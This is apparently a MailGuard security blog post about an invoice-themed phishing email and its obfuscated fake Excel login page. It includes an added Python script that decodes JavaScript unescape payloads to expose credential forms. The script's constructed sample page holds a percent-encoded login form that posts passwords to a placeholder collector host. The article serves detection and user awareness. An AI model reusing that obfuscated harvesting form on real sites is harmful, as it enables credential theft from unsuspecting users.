Akankasha Dewan 19 October 2020 18:03:36 AEDT 3 MIN READ

Email uses link to "payslip invoice" to deliver phishing attack

Invoices can be very costly indeed – and not always in the traditional sense. A recent phishing invoice email scam detected by MailGuard is designed to trick victims into revealing their confidential data.

Titled “PAYSLIP INVOICE OCTOBER – 2020”, the email looks like a fairly standard office email, and tells recipients to urgently view an “attached secured timesheet and invoice for october” in order to proceed with payment. A link to view the invoice is included, presented as a Microsoft Excel attachment, and the email ends with a signature belonging to a representative of a European company, complete with contact details and office address. It actually originates from an unrelated email address with a fairly new domain name.

Here’s what the email looks like:




Unsuspecting recipients who click on the link are led to a silent redirect page hosted on a compromised site for a different European company, before being presented with a Microsoft Excel-branded login page with its background blurred, as per the below:



This is a phishing page hosted on Google Cloud, and it uses JavaScript’s unescape function to obscure the HTML of the page: the raw source contains only a percent-encoded string, which the browser decodes into the login form at load time. This is most likely an attempt to thwart automated link checking that inspects the page source rather than the rendered page.
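The unescape trick described above, as an added example that is not MailGuard's code and not anything recovered from this campaign: a small Python analysis helper that decodes `unescape("...")` payloads the way a browser would (both `%XX` and `%uXXXX` sequences) and then reports whether the hidden HTML contains a form that posts a password field, which is the signal a link checker would otherwise miss. The sample page, the collector host name (`credential-sink.example`) and the field names are constructed for the example.

```python
import re

# Added example (not MailGuard's code): recover HTML that a phishing page hides
# behind JavaScript's unescape() so the page can be checked for credential forms.
#
# JavaScript's unescape() turns %XX into the character with that Latin-1 code
# and %uXXXX into that UTF-16 code unit; anything else is passed through.
_ESC_RE = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")

# Matches a single-literal call such as unescape("%3C...") or unescape('...').
# Kits that split the string into concatenated pieces or nest encodings need
# more work; this handles the one-layer case described above.
_CALL_RE = re.compile(r"""unescape\(\s*(["'])(.*?)\1\s*\)""", re.S)


def js_unescape(encoded: str) -> str:
    """Decode a string the way JavaScript's unescape() would."""
    def repl(m: re.Match) -> str:
        code = m.group(1) or m.group(2)
        return chr(int(code, 16))
    return _ESC_RE.sub(repl, encoded)


def decode_unescape_calls(page_source: str) -> list[str]:
    """Return the decoded payload of every unescape("...") call in the page."""
    return [js_unescape(m.group(2)) for m in _CALL_RE.finditer(page_source)]


def credential_form_indicators(decoded_html: str) -> dict:
    """Pull the signals a scanner would flag from the decoded HTML: where any
    <form> posts to, and whether a password field is present."""
    actions = re.findall(
        r"""<form[^>]*\baction\s*=\s*["']([^"']+)""", decoded_html, re.I)
    has_password = re.search(
        r"""<input[^>]*\btype\s*=\s*["']?password""", decoded_html, re.I) is not None
    return {"form_actions": actions, "password_field": has_password}


def analyze(page_source: str) -> list[dict]:
    """One indicator report per decoded unescape() payload in the page."""
    return [credential_form_indicators(h) for h in decode_unescape_calls(page_source)]


# Constructed sample: a page whose raw source shows only a percent-encoded
# string, while the browser renders a login form posting to a collector host.
# The host name is a placeholder in the reserved .example domain.
SAMPLE_PAGE = (
    "<html><body><script>"
    'document.write(unescape("%3Ctitle%3ESign%20in%20%u2013%20Excel%3C/title%3E'
    "%3Cform%20action%3D%22https%3A//credential-sink.example/post.php%22%20method%3D%22post%22%3E"
    '%3Cinput%20type%3D%22password%22%20name%3D%22pw%22%3E%3C/form%3E"));'
    "</script></body></html>"
)

if __name__ == "__main__":
    # A raw-source grep for "<form" finds nothing in SAMPLE_PAGE;
    # decoding first is what exposes the credential form.
    print("raw source mentions a form:", "<form" in SAMPLE_PAGE)
    for report in analyze(SAMPLE_PAGE):
        print(report)
```

Running the script against the constructed page shows the raw source containing no `<form` tag at all, while the decoded payload reveals a form posting a password field to the placeholder host; the same `analyze()` call can be pointed at any saved page source to get the decoded form targets for blocklisting or takedown requests.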

Once users “log in” by entering their email address and password, the attacker harvests the credentials for later use, and the user is shown an error saying that the credentials are invalid.

As you can see from the screenshots above, cybercriminals have employed multiple elements to trick recipients. For example, this email attempts to intrigue recipients by telling them a new document, i.e. “a payslip invoice”, has arrived. In addition, it asks recipients to go through the document “urgently”. This motivates the recipient to click on the provided link right away, distracting them from checking the sending address of the email and looking out for any other errors. The inclusion of the words “Outlook Docs” in the display name also suggests the email is sent from a credible source using a reputable Microsoft service, boosting its apparent legitimacy.

This invoice-related phishing scam is a good reminder of how innocent-looking emails can, in fact, be malicious. As simple as they may seem, these attacks are happening all too regularly, and with devastating effect. Not only can attackers gain access to the confidential data of individual employees and firms, they can, ultimately, inflict significant financial and reputational damage on an organisation.

In such cases, users are reminded of the importance of not opening or clicking on documents from unknown senders, regardless of the organisation they purport to be from. Attachments and links should only be opened when users are certain of the sender's credibility.

As a precaution, MailGuard urges you not to click links within emails that:

  • Are not addressed to you by name.
  • Appear to be from a legitimate company but use poor English, or omit personal details that a legitimate sender would include.
  • Are from businesses that you were not expecting to hear from.
  • Take you to a landing page or website that is not the legitimate URL of the company the email is purporting to be sent from.

One email is all that it takes

All that it takes to break into your business is a cleverly-worded email message. If scammers can trick one person in your company into clicking on a malicious link they can gain access to your data.

For a few dollars per staff member per month, you can protect your business with MailGuard's predictive and advanced email security.

Talk to a solution consultant at MailGuard today about securing your company's network.
